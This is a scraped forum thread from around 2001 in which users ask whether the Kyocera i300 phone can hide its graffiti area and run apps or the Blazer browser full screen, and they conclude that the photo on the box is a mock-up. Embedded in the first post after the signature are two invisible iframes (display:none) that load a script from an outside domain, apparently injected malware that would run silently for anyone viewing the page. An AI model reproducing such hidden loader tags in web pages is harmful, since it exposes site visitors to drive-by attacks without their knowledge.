+ Reply to Thread

Question Does ANYTHING but the keypad use the whole screen?

On the back of the i300's box, there's a picture of the phone running a browser. The browser takes up the whole screen -- there is no grafitti area.

I had an impression, before I saw the box, that Blazer was going to use the whole screen. It does not. (Does it for anyone?)

Has anyone tried an app that was designed for other soft graffiti palms? Have they gotten anything at all -- well, anything but the keypad and the moonlit "phone off" screen -- to run in full screen?

-vave<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Last edited by Vave; 11-11-2001 at 10:01 PM.

Dan
    Hmm, I never noticed that on the back of the box. Now that I see it, however, I'm forced to think it's a fake. Here's why: Notice also that the signal strength, voice mail and battery icons are missing?

Administrator

Arrow

i dont know where i put my box, but i betcha that picture was made months before the updated blazer web was even designed for the phone... so i would bet its a CG make up...

You could, of course, call Sprint and ask them how to make your phone do this - it'll drive them crazy.

If you yell enough about 'false advertising' then you'll prolly get a month's service credit......
    CB1111

When in trouble - obfuscate

I'm sorry if I seemed to be putting emphasis on that photo. I agree that it's a mock-up.

But has anyone tried software that's designed to take advantage of the soft grafitti areas on other palms (by TRG Pro I think?) Any success?

-vave

Cool Can you hide the graffiti area?

I've heard you can, and I've heard you can't (both in this forum). If you can't, why do they show an edge to edge palm screen (with the graffiti area hidden) right on the back of the box? - check it out!

Question Grafitti area

The question is can we make it hide or not?
    Let's hear it from the experts.
    Come on boy answer this one,